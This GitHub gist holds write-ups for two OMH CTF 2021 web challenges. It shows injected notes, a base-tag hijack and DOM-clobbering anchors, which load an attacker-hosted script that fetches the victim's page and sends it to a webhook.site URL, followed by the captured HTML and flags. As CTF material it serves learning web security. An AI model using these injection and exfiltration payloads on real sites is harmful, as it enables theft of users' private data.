Skip to content

Instantly share code, notes, and snippets.

@arkark

arkark/omh-ctf-2021.md

Last active May 16, 2021 12:06
Show Gist options
  • Save arkark/1501d4ad9590f3dcb101abffee9524bf to your computer and use it in GitHub Desktop.
Save arkark/1501d4ad9590f3dcb101abffee9524bf to your computer and use it in GitHub Desktop.
Download ZIP
OMH CTF 2021 writeups
Raw
omh-ctf-2021.md

OMH CTF 2021 writeups

Polite Notepad

I hosted the following file on my server at http://evil.example.com/static/badwords.js:

var bad1 = 'fuck'
var good1 = 'f**k'
var bad2 = 'shit'
var good2 = 's**t'
var bad3 = 'damn'
var good3 = 'd**n'
var bad4 = 'dragon sector'
var good4 = 'p4'

const main = async () => {
  const text = await (await fetch("http://politenotepad.zajebistyc.tf/")).text();
  location = "https://webhook.site/xxxxx-xxxxx-xxxxx/?q=" + encodeURIComponent(text);

};
main();

And, I posted the following note:

<base href="http://evil.example.com">

Then, I got:

<html> <head> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous"> <title>Note</title> </head> <body> <nav class="navbar navbar-expand-lg navbar-light bg-light"> <a class="navbar-brand" href="#">Polite Notepad</a> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto"> <li class="nav-item"> <a class="nav-link" href="/">My notes</a> </li> <li class="nav-item"> <a class="nav-link" href="/add">Add note</a> </li> <li class="nav-item"> <a class="nav-link" href="/share">Share a link</a> </li> <li class="nav-item"> <a class="nav-link" href="/logout">Logout</a> </li> </ul> </div> </nav> <div class="container"> <ul> <li> <a href="/note/bDMHwXkduXrElcgoTQVwjSBYhNZaHf">flag is here</a> </li> </ul> </div> </body> </html>

A flag at http://politenotepad.zajebistyc.tf/note/bDMHwXkduXrElcgoTQVwjSBYhNZaHf:

p4{they_said_it_could_be_used_only_once...}

Politer Notepad

I hosted the following file on my server at http://evil.example.com/attack.js with access-control-allow-origin: * header:

const main = async () => {
  const text = await (await fetch("http://politernotepad.zajebistyc.tf/")).text();
  location = "https://webhook.site/xxxxx-xxxxx-xxxxx/?q=" + encodeURIComponent(text);
};
main();

And, I posted the following note:

<a id=bad1 href="a:<script"></a>
<a id=good1 href="a:a"></a>
<a id=bad2 href="ttp:="></a>
<a id=good2 href='ttp://evil.example.com/attack.js" type=module><script></script>'></a>
<a id=bad3 href="a:a"></a>
<a id=good3 href="a:a"></a>
<a id=bad4 href="a:a"></a>
<a id=good4 href="a:a"></a>
a:<script x="

Then, I got:

<html> <head> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous"> <title>Note</title> </head> <body> <nav class="navbar navbar-expand-lg navbar-light bg-light"> <a class="navbar-brand" href="#">Polite Notepad</a> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto"> <li class="nav-item"> <a class="nav-link" href="/">My notes</a> </li> <li class="nav-item"> <a class="nav-link" href="/add">Add note</a> </li> <li class="nav-item"> <a class="nav-link" href="/share">Share a link</a> </li> <li class="nav-item"> <a class="nav-link" href="/logout">Logout</a> </li> </ul> </div> </nav> <div class="container"> <ul> <li> <a href="/note/uchoxQeMwTgjeNrtljOPmDfriOkdkR">flag is here</a> </li> </ul> </div> </body> </html>

A flag at http://politernotepad.zajebistyc.tf/note/uchoxQeMwTgjeNrtljOPmDfriOkdkR:

p4{hope_you_solved_it_the_righ_way_now!}

This chall is a fun puzzle 👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment